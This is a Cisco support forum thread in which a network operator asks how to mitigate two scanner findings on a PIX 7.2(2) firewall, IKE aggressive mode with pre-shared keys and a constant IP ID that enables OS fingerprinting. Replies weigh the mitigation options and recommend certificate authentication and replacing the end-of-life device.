Buy or Renew
Buy or Renew
Duo Security forums now LIVE! Get answers to all your Duo Security questions. Learn more
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
cancel
Start a conversation
716
Views
3
Helpful
6
Replies

Cisco PIX 7.2(2) vulnerabilities

Go to solution
Operador NOC Entercs
Level 1
Level 1

‎06-20-2014 01:12 PM - edited ‎03-11-2019 09:21 PM

Hello

 

Hope you are doing well, I kindly ask for your help.

 

I have a Cisco PIX Security Appliance Software Version 7.2(2) and I have detected the next vulnerabilities:

 

OUTSCAN detected one medium-risk vulnerability that is related to the Internet Key Exchange

An Internet Key Exchange service supports aggressive mode. When used in combination with pre-shared keys, aggressive mode will transmit a hash of the secret in plain text. An attacker can then do an offline brute force of that hash to retrieve the clear-text secret.

You can implement the following one or more of the following security policies to mitigate this:
1)Disable aggressive mode on your VPN Gateway
2) Use public key authentication instead of pre-shared keys
3) Only allow VPN connections from whitelisted addresses
4) Ensure that you have a strong pre-shared key.

OUTSCAN also detected one medium-risk vulnerability that is related to Constant IP Identification

The UDP implementation for this system keeps the IP Identification field at 0 for all non-fragmented
packets, which could allow remote attackers to determine the operating system running on the target
system. Please contact the vendor for a suitable solution.

 

In the first vulnerability, I want to know if there is some risk or a loss of service if I follow that recommendations, in order to mitigate that vulnerability.


And in the second, I want to know what can I do to mitigate it.

 

Thank you for your comments.

Best regards!

Iván

 

Labels:
0 Helpful
1 Accepted Solution

Accepted Solutions

Go to solution
Tushar Bangia
Level 1
Level 1

‎06-20-2014 10:20 PM

Hi Ivan,

 

Please find the explanation to your query as below:

 

Vulnerability 1:

Aggressive mode does not give identity protection of the two IKE peers, unless digital certificates are used. This means VPN peers exchange their identities without encryption (clear text). The above vulnerability is confirming this behavior.

 

With the use of digital certificates we can encrypt the identity information of VPN peers hence make the Phase 1 negotiation secure for Aggressive mode.

 

Refer below link for more information on setting up authentication with digital certificate:

http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/100413-asavpnclient-ca.html

 

Risks as per the above recommendation:

1)Disable aggressive mode on your VPN Gateway

If you disable aggressive mode than the Remote access VPN client would not be able to connect.

2) Use public key authentication instead of pre-shared keys
 

This is a viable solution to get rid of this vulnerability however this would also augur changes in VPN implementation.

http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/100413-asavpnclient-ca.html

 

3) Only allow VPN connections from whitelisted addresses

I believe this would be very difficult to implement as its almost impossible to track or create whitelist fot the source IP of remote access VPN client.  

 

4) Ensure that you have a strong pre-shared key.

Having a strong pre-shared key can delay the brute force attack however it does not completely re-mediate the vulnerability.

 

Vulnerability 2:

It refers to OS fingerprinting, i.e. a remote scanning tool may be able to identify the OS running on the device. 

 

One remediation i could think of is placing an IPS in front of the firewall hence this would also account for design changes, hence i would also request you to wait for other experts to answer on this.

 

Regards,

 

Tushar Bangia

 

Please rate this post if you find this helpful.

 

 

 

 

View solution in original post

0 Helpful
6 Replies 6

Go to solution
Tushar Bangia
Level 1
Level 1

‎06-20-2014 10:20 PM

Hi Ivan,

 

Please find the explanation to your query as below:

 

Vulnerability 1:

Aggressive mode does not give identity protection of the two IKE peers, unless digital certificates are used. This means VPN peers exchange their identities without encryption (clear text). The above vulnerability is confirming this behavior.

 

With the use of digital certificates we can encrypt the identity information of VPN peers hence make the Phase 1 negotiation secure for Aggressive mode.

 

Refer below link for more information on setting up authentication with digital certificate:

http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/100413-asavpnclient-ca.html

 

Risks as per the above recommendation:

1)Disable aggressive mode on your VPN Gateway

If you disable aggressive mode than the Remote access VPN client would not be able to connect.

2) Use public key authentication instead of pre-shared keys
 

This is a viable solution to get rid of this vulnerability however this would also augur changes in VPN implementation.

http://www.cisco.com/c/en/us/support/docs/security/asa-5500-x-series-next-generation-firewalls/100413-asavpnclient-ca.html

 

3) Only allow VPN connections from whitelisted addresses

I believe this would be very difficult to implement as its almost impossible to track or create whitelist fot the source IP of remote access VPN client.  

 

4) Ensure that you have a strong pre-shared key.

Having a strong pre-shared key can delay the brute force attack however it does not completely re-mediate the vulnerability.

 

Vulnerability 2:

It refers to OS fingerprinting, i.e. a remote scanning tool may be able to identify the OS running on the device. 

 

One remediation i could think of is placing an IPS in front of the firewall hence this would also account for design changes, hence i would also request you to wait for other experts to answer on this.

 

Regards,

 

Tushar Bangia

 

Please rate this post if you find this helpful.

 

 

 

 

0 Helpful

Go to solution
Operador NOC Entercs
Level 1
Level 1
In response to Tushar Bangia

‎06-21-2014 11:40 AM

Hi Tushar

Thank you very much for your useful comments. So in my understanding, in the first vulnerability I think that the fourth recommendation is the most simple and quick to implement right?

In the second, I will discuss with my client the posibility of placing an IPS, also I will follow your recommendation of waiting more answers.

Thank you again and regards!

Iván

0 Helpful

Go to solution
Tushar Bangia
Level 1
Level 1
In response to Operador NOC Entercs

‎06-23-2014 08:54 AM

Hi Ivan,

 

As per the four options the 4th one seems to be the most simple to implement, however I wish to re-iterate that this is not the best option. The option number 2 is the best possible remediation for the vulnerability.

 

Regards,

 

Tushar Bangia

 

 

Please rate the post if you find it helpful..

0 Helpful

Go to solution
Tushar Bangia
Level 1
Level 1
In response to Tushar Bangia

‎06-23-2014 08:59 AM

Hi Ivan,

 

I also second Marvin's recommendations as firewall with which you are working i.e. PIX is end of engineering and hence there isn't any development team working to fix the code anomalies/vulnerabilities.

 

Regards,

Tushar Bangia

 

Please rate the post if you find it helpful..

 

0 Helpful

Go to solution
Marvin Rhoads
Hall of Fame
Hall of Fame

‎06-21-2014 06:25 AM

I would add that if it is important enough for your business to audit the perimeter security they should consider investing in a current generation firewall with a more secure overall profile and options for configuring the system to mitigate vulnerabilities consistent with your security requirements.

The Pix was end-of-sales in 2008. Your options for upgrading software are very limited and support is no longer available.

 

Go to solution
Operador NOC Entercs
Level 1
Level 1
In response to Marvin Rhoads

‎06-21-2014 11:44 AM

Hello Marvin

Thanks for your comments, you are right, that is why parallel to this issues, we are considering implementing an ASA, but first we need to try to mitigate this vulnerabilities.

Best regards!

Iván

0 Helpful
Customers Also Viewed These Support Documents
Review Cisco Networking products for a $25 gift card